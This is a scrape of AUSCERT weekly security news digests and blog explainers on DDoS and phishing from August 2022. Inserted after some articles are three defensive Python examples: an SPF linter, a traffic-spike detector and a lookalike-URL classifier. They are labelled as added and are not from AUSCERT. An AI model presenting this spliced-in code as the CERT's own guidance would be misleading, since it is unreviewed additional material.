Week in review

AUSCERT Week in Review for August 19th 2022

Greetings,

This Sunday, August 21, marks the final day of this year’s National Science Week. An annual celebration of science and technology, it’s a great opportunity to imbue curious minds with knowledge and insights into a plethora of areas. Everything from agriculture, health and medicine, technology and the great expanse of space is available to explore, analyze, experience and challenge as we seek to understand, innovate, and transform. Learn more about what others are doing and what you can do by visiting the National Science Week website.

The realm of cyber is one area that is constantly evolving and something that we here at AUSCERT like to maintain awareness of, which we then share with our members. A fantastic way to gain insights and understanding on an array of topics is through our podcast series, Share today, save tomorrow. With fourteen episodes currently available, you can select from several areas that may pique your interest including ‘ITOT Convergence’, ‘Strategic Resilience and Psychology in Cyber Security’ and our latest edition, ‘Diversity and Culture in Cyber Security’.

Another means of seeking to understand is through the tried-and-true method of simply asking. The team at RMIT University are doing just that in their survey that seeks to gain a more accurate picture of the security industry in Australia. You can share your insights and experience to help expand and diversify the workforce and help understand and prepare for future challenges.

Apple releases Safari 15.6.1 to fix zero-day bug used in attacks
Date: 2022-08-18 Author: Bleeping Computer
[See AUSCERT Security Bulletin ESB-2022.4103 for more information]
Apple has released Safari 15.6.1 for macOS Big Sur and Catalina to fix a zero-day vulnerability exploited in the wild to hack Macs. The zero-day patched today (CVE-2022-32893) is an out-of-bounds write issue in WebKit that could allow a threat actor to execute code remotely on a vulnerable device.
“Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited,” warns Apple in a security bulletin released today.

Google Chrome Zero-Day Found Exploited in the Wild
Date: 2022-08-18 Author: Dark Reading
[See AUSCERT Bulletins ESB-2022.4128 & ESB-2022.4102 for more information]
A zero-day security vulnerability in Google’s Chrome browser is being actively exploited in the wild. The Internet behemoth released 11 security patches for Chrome this week, which are now being pushed out in stages to those with automatic updates enabled for Windows, Mac, and Linux; however, everyone can manually update now. The zero-day (CVE-2022-2856) is rated as high severity and involves “insufficient validation of untrusted input in Intents,” according to Google’s advisory. Intents, where the bug resides, are used by Chrome to process user input; if the browser doesn’t validate this input properly, an attacker is able to specially craft an input (say, a post in the comments section of a website) that’s not expected by the application.

Twilio phish sees Signal users’ numbers at risk of re-registering
Date: 2022-08-16 Author: IT News
Locally stored user information can’t be compromised, company says. Fallout from the recent phishing attack on communications company Twilio has spilt over to encrypted messaging app Signal, with users reporting bogus number re-registration attempts. Twilio provides Signal with phone number verification services, meaning the attacker may have been able to learn that some numbers were associated with Signal users.

Digital Ocean dumps Mailchimp after attack leaked customer email addresses
Date: 2022-08-16 Author: The Register
Junior cloud Digital Ocean has revealed that some of its clients’ email addresses were exposed to attackers, thanks to an attack on email marketing service Mailchimp.
This story starts last week when some of the blockheads in crypto-land noticed that email marketing service Mailchimp had suspended service for some of their fellow travellers. Reports such as this missive noted that Mailchimp has previously ditched crypto clients for generating more abuse reports than other customers, and the company’s Acceptable Use Policy therefore warns it may decide not to serve companies that offer “Cryptocurrencies, virtual currencies, and any digital assets related to an Initial Coin Offering.”

How a spoofed email passed the SPF check and landed in my inbox
Date: 2022-08-16 Author: WeLiveSecurity
According to one study published in 2022, around 32% of the 1.5 billion domains investigated had SPF records. Out of these, 7.7% had invalid syntax and 1% were using the deprecated PTR record, which points IP addresses to domain names. Uptake of SPF has been slow and flawed indeed, which might lead to another question: how many domains have overly permissive SPF records?

Zoom Patches Serious macOS App Vulnerabilities Disclosed at DEF CON
Date: 2022-08-16 Author: Security Week
[See AUSCERT Security Bulletin ESB-2022.4080 for more information]
Zoom informed customers last week that macOS updates for the Zoom application patch two high-severity vulnerabilities. Details of the flaws were disclosed on Friday at the DEF CON conference in Las Vegas by macOS security researcher Patrick Wardle. Wardle, who is the founder of the Objective-See Foundation, a non-profit that provides free and open source macOS security resources, showed at DEF CON how a local, unprivileged attacker could exploit vulnerabilities in Zoom’s update process to escalate privileges to root.

Thousands of VNC Instances Exposed to Internet as Attacks Increase
Date: 2022-08-15 Author: Security Week
Dark web intelligence firm Cyble reports seeing an increase in cyberattacks targeting virtual network computing (VNC).
The VNC graphical desktop-sharing system relies on the Remote Frame Buffer (RFB) protocol to provide control of a remote machine over a network. Exposing VNC to the internet has long been deemed a security risk, yet Cyble has identified over 8,000 internet-accessible VNC instances that have authentication disabled.

ESB-2022.4080 – Zoom Client for Meetings for macOS: CVSS (Max): 8.8
Zoom reported Local Privilege Escalation in Zoom Client for Meetings for macOS. Applying current updates or downloading the latest Zoom software is recommended.

ESB-2022.4077 – Splunk Enterprise: CVSS (Max): 7.4
A vulnerability in Splunk Enterprise that affects connections between Splunk Enterprise and Ingest Actions Destination has been reported. Splunk customers are advised to upgrade Splunk Enterprise 9.0.0 to 9.0.1 or higher.

ESB-2022.4102 – ALERT Google Chrome: CVSS (Max): None
Google Chrome released an update for Stable Channel and Extended Stable Channel. Google advised that this update will be rolled out over the coming days/weeks.

ESB-2022.4103 – Safari 15.6.1: CVSS (Max): None
Safari 15.6.1 has been released to address an issue in WebKit and is available for macOS Big Sur and macOS Catalina. Apple has reported that this issue may have been actively exploited.

ESB-2022.3992.2 – UPDATE PAN-OS: CVSS (Max): 8.6
Palo Alto Networks has identified a vulnerability in URL Filtering which, if exploited, could allow a network-based attacker to conduct reflected and amplified TCP denial-of-service (RDoS) attacks.

Stay safe, stay patched and have a good weekend!
The AUSCERT team
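The WeLiveSecurity item above turns on three SPF record defects: invalid syntax, the deprecated ptr mechanism, and overly permissive policies. The following linter, added here as an example rather than code from the article or from AUSCERT, checks a record string for all three offline; the sample records are constructed and the "very broad range" prefix thresholds are assumptions.

```python
"""Lint a published SPF TXT record for invalid syntax, the deprecated ptr
mechanism and overly permissive policies. Added example; the sample records
are constructed and the BROAD_PREFIX thresholds are assumptions."""
import ipaddress
import re
from typing import List, Tuple

Finding = Tuple[str, str]   # (severity, message)

MECHANISMS = {"all", "include", "a", "mx", "ptr", "ip4", "ip6", "exists"}
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists"}   # each costs a DNS lookup
MAX_DNS_LOOKUPS = 10                                    # RFC 7208 section 4.6.4 limit
BROAD_PREFIX = {4: 16, 6: 48}                           # assumed "too broad" thresholds

TERM_RE = re.compile(r"([+\-~?]?)([A-Za-z0-9]+)(.*)")   # qualifier, mechanism, argument


def check_ip_term(name: str, arg: str, term: str) -> List[Finding]:
    """Validate the address or CIDR argument of an ip4/ip6 mechanism."""
    try:
        net = ipaddress.ip_network(arg, strict=False)
    except ValueError:
        return [("error", f"invalid address in: {term}")]
    expected = 4 if name == "ip4" else 6
    if net.version != expected:
        return [("error", f"{name} given an IPv{net.version} address: {term}")]
    if net.prefixlen < BROAD_PREFIX[expected]:
        return [("warning", f"very broad range ({net.num_addresses} addresses) in: {term}")]
    return []


def lint_spf(record: str) -> List[Finding]:
    """Return findings for one SPF record string; an empty list means nothing was flagged."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return [("error", "record does not start with v=spf1")]
    findings: List[Finding] = []
    lookups = 0
    saw_all = saw_redirect = False
    for term in terms[1:]:
        if saw_all:
            findings.append(("warning", f"term after 'all' is never evaluated: {term}"))
            continue
        if "=" in term and ":" not in term.split("=", 1)[0]:
            # modifier (name=value), e.g. redirect=_spf.example.net or exp=explain.example.net
            name, _, value = term.partition("=")
            if not value:
                findings.append(("error", f"modifier without value: {term}"))
            elif name.lower() == "redirect":
                saw_redirect = True
                lookups += 1
            elif name.lower() != "exp":
                findings.append(("info", f"unknown modifier ignored: {term}"))
            continue
        match = TERM_RE.fullmatch(term)
        if not match:
            findings.append(("error", f"unparseable term: {term}"))
            continue
        qualifier, name, rest = match.group(1) or "+", match.group(2).lower(), match.group(3)
        if name not in MECHANISMS:
            findings.append(("error", f"unknown mechanism: {term}"))
            continue
        if rest and rest[0] not in ":/":
            findings.append(("error", f"malformed argument in: {term}"))
            continue
        arg = rest[1:] if rest.startswith(":") else rest   # "a/24" keeps its prefix length
        if name in LOOKUP_TERMS:
            lookups += 1
        if name == "ptr":
            findings.append(("warning", f"deprecated ptr mechanism (slow, unreliable): {term}"))
        elif name in ("include", "exists") and not arg:
            findings.append(("error", f"{name} requires a domain: {term}"))
        elif name in ("ip4", "ip6"):
            findings.extend(check_ip_term(name, arg, term))
        elif name == "all":
            saw_all = True
            if rest:
                findings.append(("error", f"'all' takes no argument: {term}"))
            if qualifier == "+":
                findings.append(("critical", "'+all' lets any sender pass SPF (spoofable)"))
            elif qualifier == "?":
                findings.append(("warning", "'?all' is neutral: unlisted senders never fail"))
            elif qualifier == "~":
                findings.append(("info", "'~all' softfail: receivers usually still deliver; rely on DMARC to reject"))
    if not saw_all and not saw_redirect:
        findings.append(("warning", "no 'all' mechanism or redirect: unlisted senders get neutral"))
    if lookups > MAX_DNS_LOOKUPS:
        findings.append(("error", f"{lookups} DNS-lookup terms exceed the limit of {MAX_DNS_LOOKUPS} (permerror)"))
    return findings


# Constructed sample records (not any real domain's published policy).
GOOD_RECORD = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"
PERMISSIVE_RECORD = "v=spf1 ip4:0.0.0.0/0 ptr +all"
BROKEN_RECORD = "v=spf1 ip4:203.0.113.300 include: mx -al"

if __name__ == "__main__":
    for label, rec in [("good", GOOD_RECORD), ("permissive", PERMISSIVE_RECORD), ("broken", BROKEN_RECORD)]:
        print(label, lint_spf(rec) or "OK")
```

Feed it the TXT value fetched for your own domain to see which of the three article findings applies to you.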


Week in review

AUSCERT Week in Review for August 12th 2022

Greetings,

“Malvertising” is a term that has gained some attention this week as it grows in use to infiltrate networks and devices (also known as a browser-in-browser (BitB) attack). The term refers to malicious advertising, a practice that uses online advertising that appears genuine and requires very little or even no interaction from the user. To help understand and combat such campaigns, National Cyber Security News Today provides an examination of the potential threat and how to safeguard against it.

AUSCERT wanted to remind folk that the deadline for .au direct domain availability, and its implications, are fast approaching. As per the ACSC alert, Australians have until 20 September 2022 to seek priority allocation of a .au direct domain name that matches their existing domain name. AUSCERT published a blog on the changes to assist members to understand potential threats and provide our members with an analysis of the situation.

Lastly, we wanted to acknowledge World Youth Day, a UN initiative that focuses on education, employment, the environment, delinquency, girls and young women, HIV/AIDS and intergenerational relations as well as conflict resolution and social justice, to name a few, held each year on August 12 (today!).

Organizations Warned of Critical Vulnerabilities in NetModule Routers
Date: 2022-08-10 Author: Security Week
Flashpoint is warning organizations of two newly identified critical vulnerabilities in NetModule Router Software (NRSW) that could be exploited in attacks. Acquired by Belden earlier this year, NetModule provides IIoT and industrial routers, vehicle routers, and other types of wireless M2M connectivity products. All of NetModule’s routers run the Linux-based NRSW by default, and can be managed remotely using a remote management platform.

Cisco hacked by Yanluowang ransomware gang, 2.8GB allegedly stolen
Date: None Author: Bleeping Computer
Cisco confirmed today that the Yanluowang ransomware group breached its corporate network in late May and that the actor tried to extort them under the threat of leaking stolen files online. The company revealed that the attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee’s account.

Meraki firewalls blocked Office365 traffic as attempted intrusion
Date: 2022-08-11 Author: iTnews
Microsoft Office365 users behind Cisco Meraki firewalls found themselves unable to reach their services, after the security vendor inadvertently blocked legitimate traffic. The firewalls were identifying legitimate traffic as an attempted denial-of-service attack against Windows IIS, as reported in this Reddit post. “We use Meraki firewalls and starting this morning Meraki was blocking valid Microsoft IPs in the Security Center. The SNORT rule details were ‘Microsoft Windows IIS denial-of-service attempt’ and the destination IPs were Microsoft,” the post states. SNORT is an open source signature-based intrusion prevention system.

Patch Wednesday fixes two-year-old Dogwalk vulnerability
Date: 2022-08-10 Author: iTnews
Microsoft has fixed a remote code execution vulnerability in its MSDT diagnostics tool for Windows, first reported to the company two years ago and rediscovered in May this year. The fix is part of this month’s Patch Wednesday; the vulnerability was named Dogwalk by security researchers. Although researcher Imre Rad reported the bug to Microsoft in January 2020, and despite the vulnerability raising its head again this year, the software giant initially declined to fix the issue.

New GwisinLocker ransomware encrypts Windows and Linux ESXi servers
Date: 2022-08-06 Author: Bleeping Computer
A new ransomware family called ‘GwisinLocker’ targets South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors, including support for encrypting VMware ESXi servers and virtual machines. The new malware is the product of a lesser-known threat actor dubbed Gwisin, which means “ghost” in Korean. The actor is of unknown origin but appears to have a good knowledge of the Korean language.

Dark web investigation uncovers ransomware marketplace
Date: 2022-08-05 Author: Cyber Security Connect
A new Venafi dark web investigation has uncovered 475 webpages of sophisticated ransomware products and services, with ransomware-as-a-service (RaaS) being the most accessible for procurement. The research was conducted between November 2021 and March 2022 in partnership with criminal intelligence provider Forensic Pathways. Over 35 million dark web URLs were analysed, including marketplaces and forums, using the Forensic Pathways dark search engine. The researchers found that many strains of ransomware being sold have been successfully used in high-profile attacks, with 87 per cent of the ransomware found on the dark web capable of delivering malicious macros in order to infect targeted systems. These include Babuk, GoldenEye, Darkside/BlackCat, Egregor, HiddenTear and WannaCry.

Windows devices with newest CPUs are susceptible to data damage
Date: 2022-08-08 Author: Bleeping Computer
Microsoft has warned today that Windows devices with the newest supported processors are susceptible to “data damage” on Windows 11 and Windows Server 2022. “Windows devices that support the newest Vector Advanced Encryption Standard (AES) (VAES) instruction set might be susceptible to data damage,” the company revealed today.
Devices affected by this newly acknowledged known issue use AES-XTS (AES XEX-based tweaked-codebook mode with ciphertext stealing) or AES-GCM (AES with Galois/Counter Mode) block cipher modes on new hardware.

Over 60% of Organizations Expose SSH to the Internet
Date: 2022-08-05 Author: Infosecurity Magazine
A majority of global organizations are exposing sensitive and insecure protocols to the public internet, potentially increasing their attack surface, according to ExtraHop. The vendor analyzed a range of enterprise IT environments to benchmark cybersecurity posture based on open ports and sensitive protocol exposure. It found that 64% of those studied have at least one device exposing SSH, which could allow attackers to probe it for remote access.

Microsoft’s big Patch Tuesday fixes exploited zero-day flaw and 120 more bugs
Date: 2022-08-10 Author: ZDNet
Microsoft has released patches for 141 flaws in its August 2022 Patch Tuesday update including two previously undisclosed (zero-day) flaws, of which one is actively being exploited. The total patch count for the August 2022 Patch Tuesday Update actually includes 20 flaws in Edge that Microsoft had previously released fixes for, leaving 121 flaws affecting Windows, Office, Azure, .NET Core, Visual Studio and Exchange Server. The Zero Day Initiative noted that the volume of fixes released this month is “markedly higher” than what is normally expected in an August release. “It’s almost triple the size of last year’s August release, and it’s the second largest release this year,” the bug hunting group said.

Hackers Exploit Twitter Vulnerability to Expose 5.4 Million Accounts
Date: 2022-08-06 Author: The Hacker News
Twitter on Friday revealed that a now-patched zero-day bug was used to link phone numbers and emails to user accounts on the social media platform.
“As a result of the vulnerability, if someone submitted an email address or phone number to Twitter’s systems, Twitter’s systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any,” the company said in an advisory.

Slack Resets Passwords After a Bug Exposed Hashed Passwords for Some Users
Date: 2022-08-06 Author: The Hacker News
Slack said it took the step of resetting passwords for about 0.5% of its users after a flaw exposed salted password hashes when creating or revoking shared invitation links for workspaces. “When a user performed either of these actions, Slack transmitted a hashed version of their password to other workspace members,” the enterprise communication and collaboration platform said in an alert on 4th August.

ESB-2022.3942 – Intel Data Center Manager: CVSS (Max): 9.0
Intel reports that a vulnerability in the Intel Data Center Manager may allow escalation of privilege or denial of service.

ESB-2022.3975 – OpenShift Container Platform 4.11.0: CVSS (Max): 9.8
Security updates for Red Hat OpenShift Container Platform 4.11 contain packages and images that fix several bugs and add enhancements.

ESB-2022.3966 – Adobe Commerce and Magento Open Source: CVSS (Max): 9.1
Adobe’s most recent update for Adobe Commerce and Magento Open Source resolves critical, important and moderate vulnerabilities which, if exploited, could lead to arbitrary code execution, privilege escalation and security feature bypass.

ESB-2022.3962 – ALERT Open AMT Cloud Toolkit: CVSS (Max): 9.9
Intel has released updates to mitigate a potential vulnerability in the Open AMT Cloud Toolkit software which, if exploited, could allow escalation of privilege.

ASB-2022.0182 – ALERT Windows 7 and Windows Server 2008: CVSS (Max): 9.8
Microsoft’s security patch update for August 2022 resolves 29 vulnerabilities across Windows 7 and Windows Server 2008. Microsoft reports this vulnerability is publicly disclosed and actively exploited and recommends updating the software with the version made available.

ASB-2022.0181 – ALERT Microsoft Windows: CVSS (Max): 9.8*
Microsoft’s security patch update for August 2022 contains fixes for 61 vulnerabilities in Windows, Windows RT and Windows 7. Microsoft reports this vulnerability is publicly disclosed and actively exploited and recommends updating the software with the version made available.

ESB-2022.3764.2 – UPDATE ALERT VMware products: CVSS (Max): 9.8
Multiple vulnerabilities were reported in VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation. VMware recommends that these critical vulnerabilities should be patched or mitigated immediately.

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Blogs

What is DDoS & How Does it Work?

What is distributed denial of service (DDoS) & How Does it Work?

The AUSCERT team provides proactive and reactive incident response assistance, actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and satisfactory outcome. This article is aimed at those who need a high-level explanation of what a DDoS attack is.

DDoS Attacks In 2022

Already in 2022 the IT industry has experienced a large increase in distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by harmless novices who did it for fun, and back then DDoS attacks were relatively easy to mitigate. DDoS attacks are becoming an extremely sophisticated activity and, in many cases, big business. According to TechRepublic, in the first quarter of 2022, Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks. 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.

Exactly What Is a DDoS Attack?

Despite DDoS attacks becoming ever more common, they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the acronym for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple, remote locations to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible; for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelms network equipment and services such as routers, domain name services or web caching.

How Long Can DDoS Attacks Last For?

The short answer – there is no set duration. DDoS attacks vary extensively in both duration and sophistication:

Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, the largest recorded DDoS attack was against Amazon Web Services (AWS); it caused disruption for three days before finally being mitigated.

Burst Attack: Also known as pulse-wave attacks, as the name implies they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts.

Again, time is not really a factor; the quicker burst attacks can be just as damaging as the long-term attacks.

How to Protect Your Organisation Against DDoS Attacks

Some measures that organisations can take to protect themselves against DDoS attacks are:

- Reduce the attack surface of Internet-visible services to only that which is required. For example, inbound ICMP packets are unlikely to be needed and should be blocked.
- Use a Content Delivery Network (CDN).
- Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers.
- Plan for disruption, including alternative ways of providing services to clients. Short-term increases in network or server capacity may be a solution, depending on the costs. Knowing these in advance will inform business continuity planning discussions.
- Implement monitoring systems to detect large increases in outbound network traffic, to avoid becoming part of the problem and the cause of reputational damage.

Phishing Take-down service

AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. To find out more about this service click here.
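The last protective measure in the article, monitoring for large increases in outbound traffic so your own hosts are not the ones flooding someone else, and the long-term versus burst distinction it draws earlier, can be demonstrated with a small detector. This is an added example, not AUSCERT tooling: the per-interval byte counters are constructed sample data and the interval length, baseline window, spike factor and burst cut-off are assumptions to be tuned per network.

```python
"""Detect abnormal outbound traffic from a host using per-interval byte counters,
then label each run of alerts as a burst (pulse-wave) or a sustained attack.
Added example; counters are constructed and the thresholds are assumptions."""
from statistics import median
from typing import Dict, List

INTERVAL_SECONDS = 10        # assumption: one counter sample every 10 s
BASELINE_WINDOW = 6          # number of recent normal intervals forming the baseline
SPIKE_FACTOR = 5.0           # alert when volume exceeds 5x the baseline median
BURST_MAX_SECONDS = 60       # runs at or below this length are treated as burst/pulse-wave

# Constructed sample: outbound bytes per interval from one internal host.
# Intervals 0-11 are normal, 12-13 and 20 are short pulses, 26-35 is a sustained flood.
SAMPLE_OUTBOUND_BYTES: List[int] = [
    52_000, 61_000, 58_000, 66_000, 49_000, 70_000,
    55_000, 63_000, 57_000, 60_000, 51_000, 68_000,
    900_000, 1_100_000,
    59_000, 54_000, 62_000, 57_000, 65_000, 50_000,
    1_500_000,
    56_000, 61_000, 53_000, 64_000, 58_000,
    1_900_000, 2_100_000, 2_300_000, 2_200_000, 2_400_000,
    2_000_000, 2_500_000, 2_600_000, 2_200_000, 2_300_000,
]


def detect_outbound_spikes(series: List[int],
                           baseline_window: int = BASELINE_WINDOW,
                           factor: float = SPIKE_FACTOR) -> List[int]:
    """Return the indices of intervals whose volume exceeds factor x the baseline.

    The baseline is the median of the last `baseline_window` intervals judged
    normal. Flagged intervals are left out of it, so a flood in progress cannot
    raise its own threshold and hide a long-term attack after a few intervals.
    """
    normal: List[int] = []
    alerts: List[int] = []
    for index, value in enumerate(series):
        if len(normal) < baseline_window:       # still learning; accept as normal
            normal.append(value)
            continue
        baseline = max(median(normal[-baseline_window:]), 1)
        if value > factor * baseline:
            alerts.append(index)
        else:
            normal.append(value)
    return alerts


def classify_runs(alert_indices: List[int],
                  interval_seconds: int = INTERVAL_SECONDS,
                  burst_max_seconds: int = BURST_MAX_SECONDS) -> List[Dict[str, object]]:
    """Group consecutive alert intervals into runs and label each burst or sustained."""
    spans = []
    start = prev = None
    for index in alert_indices:
        if start is None:
            start = prev = index
        elif index == prev + 1:
            prev = index
        else:
            spans.append((start, prev))
            start = prev = index
    if start is not None:
        spans.append((start, prev))
    runs: List[Dict[str, object]] = []
    for first, last in spans:
        duration = (last - first + 1) * interval_seconds
        runs.append({
            "start": first,
            "end": last,
            "duration_s": duration,
            "kind": "burst" if duration <= burst_max_seconds else "sustained",
        })
    return runs


def report(series: List[int]) -> List[Dict[str, object]]:
    """Run detection and classification over one counter series."""
    return classify_runs(detect_outbound_spikes(series))


if __name__ == "__main__":
    for run in report(SAMPLE_OUTBOUND_BYTES):
        print(f"{run['kind']:9s} attack: intervals {run['start']}-{run['end']} "
              f"({run['duration_s']} s)")
```

Feeding it real per-host counters (from a flow collector or interface statistics) turns the outbound-traffic check in the list into an alert you can act on before your hosts become part of someone else's incident.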


Blogs

What is Phishing?

Phishing is an attack whereby the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly attackers will use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions.

Phishing Attacks

A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks can often be used to gain a foothold into an organisation’s network, as a part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction of market share, damaged reputation, and loss of customer trust.

Types Of Phishing Attacks

Email Phishing Scams

In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information or account credentials, or for financial gain. This type of attack is very much a numbers game: even if only 1% of several thousand recipients fall for the scam, the attack can be considered successful. As with legitimate marketing campaigns, fraudsters will also take the time and effort to improve their success rates by trialling different messaging and tactics and comparing how well each performs. They will clone emails from a spoofed organisation, using the same phrasing, typefaces, logos, and signatures to make the messages appear legitimate. Additionally, attackers will commonly try to push users into action by creating a sense of urgency. For example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought.

These scams can be hard to spot, typically having a misspelt website address or an extra subdomain; for example, www.commbank.com.au/login could be www.combank.com.au/login. The similarities between the two website addresses give the impression of a legitimate link, making it more difficult to discover that an attack is taking place.

Spear Phishing

This is a more precisely focused attack, as spear phishing targets a specific person or organisation, as opposed to thousands of people as described above. It’s a more specific type of phishing that often incorporates special knowledge about an organisation, such as its staff members’ names and titles, organisational structure and clients. A common spear phishing attack scenario is where the attackers will research names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads something like: “Updated invoice for Q3 campaigns”. This email will be a clone of the organisation’s standard email template. A link in the email redirects to a password-protected internal document, which is simply a spoofed version of a stolen invoice. The PM is requested to log in to view the document. The attacker steals the login credentials, gaining full access to sensitive areas within the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise.

How To Prevent Phishing

To protect against phishing attacks, some steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose its fraudulent purpose. These frequently include spelling errors, such as in website names. Users should also stop and think about why they’re even receiving the email and whether it seems unusual or out of character for the alleged sender.

At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks:

- Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a password and username, and something they have, such as a mobile phone running an authentication app.
- Organisations should enforce a strict password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex they can’t be remembered by people. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords and their use should be encouraged. Staff should be educated not to reuse the same password for multiple accounts, as this makes password spraying attacks much easier.
- Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing.
- Enable SPF and DMARC to make it more difficult for attackers to send email faking an organisation’s identity.

Early Warning SMS

Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. To find out more about this service click here.
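The misspelt-address and extra-subdomain tells the article uses (www.combank.com.au standing in for www.commbank.com.au) are what a link-checking filter looks for. The classifier below is an added example, not AUSCERT tooling: the protected brand list, the short table of two-label public suffixes and the sample URLs are all constructed, and the edit-distance tolerance is an assumption.

```python
"""Classify a URL's host against a list of protected brand domains, catching the
misspelt-domain and brand-as-subdomain tricks used in phishing links.
Added example; brand list, suffix table, sample URLs and tolerance are assumptions."""
from typing import List, Tuple
from urllib.parse import urlsplit

# Constructed allow-list of registrable domains we protect.
PROTECTED_DOMAINS: List[str] = ["commbank.com.au", "example.com"]

# Assumption: these two-label public suffixes are enough for the sample data;
# a production filter would use the full Public Suffix List.
MULTI_LABEL_SUFFIXES = {"com.au", "net.au", "org.au", "edu.au", "gov.au", "co.uk", "co.nz"}

MAX_EDIT_DISTANCE = 2   # assumed tolerance for "one or two characters off" misspellings


def registrable_domain(host: str) -> str:
    """Part of the host a registrant controls: login.combank.com.au -> combank.com.au."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: single-character edits needed to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url: str, protected: List[str] = PROTECTED_DOMAINS) -> Tuple[str, str]:
    """Return (verdict, brand). Verdicts: genuine, brand-as-subdomain, lookalike, unrelated."""
    if "://" not in url:
        url = "http://" + url            # urlsplit needs a scheme to find the host
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    reg = registrable_domain(host)
    reg_name = reg.split(".")[0]         # e.g. "combank" from "combank.com.au"
    for brand in protected:              # an exact registrable-domain match wins
        if reg == brand:
            return ("genuine", brand)
    # Labels in front of the registrable domain, e.g. ["commbank", "com", "au"]
    subdomain_labels = labels[:len(labels) - len(reg.split("."))]
    for brand in protected:
        name = brand.split(".")[0]
        # Extra-subdomain trick: commbank.com.au.account-verify.net
        if name in subdomain_labels:
            return ("brand-as-subdomain", brand)
        # Misspelling (combank) or brand embedded in an unrelated domain (commbank-secure)
        if name in reg_name or edit_distance(reg_name, name) <= MAX_EDIT_DISTANCE:
            return ("lookalike", brand)
    return ("unrelated", "")


if __name__ == "__main__":
    for sample in ["https://www.commbank.com.au/login",
                   "https://www.combank.com.au/login",
                   "https://commbank.com.au.account-verify.net/login",
                   "http://www.auscert.org.au/"]:
        print(sample, "->", classify_url(sample))
```

Run it over the links extracted from a suspicious message; anything other than "genuine" for a protected brand is worth a closer look before the user clicks.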


Week in review

AUSCERT Week In Review for August 5th 2022

Greetings,

It’s been three years since the smell of dagwood dogs filled the air along with the screams and laughter from people on rides at Sideshow Alley, but the Ekka is back in full swing for 2022! An event that brings the country and the city together, the Ekka is much loved in Brisbane and sees over 400,000 people attend each year. So, if you’re visiting the River City between August 6 – 14, perhaps a trip to the RNA Showgrounds is in order? There’s plenty to see, do and eat – including the popular and delicious strawberry sundaes!

Another audible array that may delight is the sound of discussing topics that inform, entertain and perhaps, make you think! Such a treat can be found in the latest episode of our podcast, Share Today, Save Tomorrow, that focuses on Diversity and Culture in Cyber Security. The episode features chats with Sasenka Abeysooriya, about changing behaviours and influencing organisational culture, and Jasmine Woolley, a proud First Nations woman, on how she utilises Indigenous knowledge to provide a fresh perspective on emerging threats to Australia’s security.

If you’re new to the world of cyber, or you have a curious mind and would like to learn more about information security principles, the next round of AUSCERT’s Intro to Cyber for IT Professionals training is taking place in late August. Facilitated by our Principal Analyst and a guest industry trainer, our two half-day courses are aimed at engaging attendees with interactive content and a focus on delivering effective training outcomes. You can view the full list of our 2022 training schedule HERE.

New Traffic Light Protocol standard released after five years
Date: 2022-08-04 Author: Bleeping Computer
The Forum of Incident Response and Security Teams (FIRST) has published TLP 2.0, a new version of its Traffic Light Protocol (TLP) standard, five years after the release of the initial version. The TLP standard is used in the computer security incident response team (CSIRT) community to facilitate the greater sharing of sensitive information.

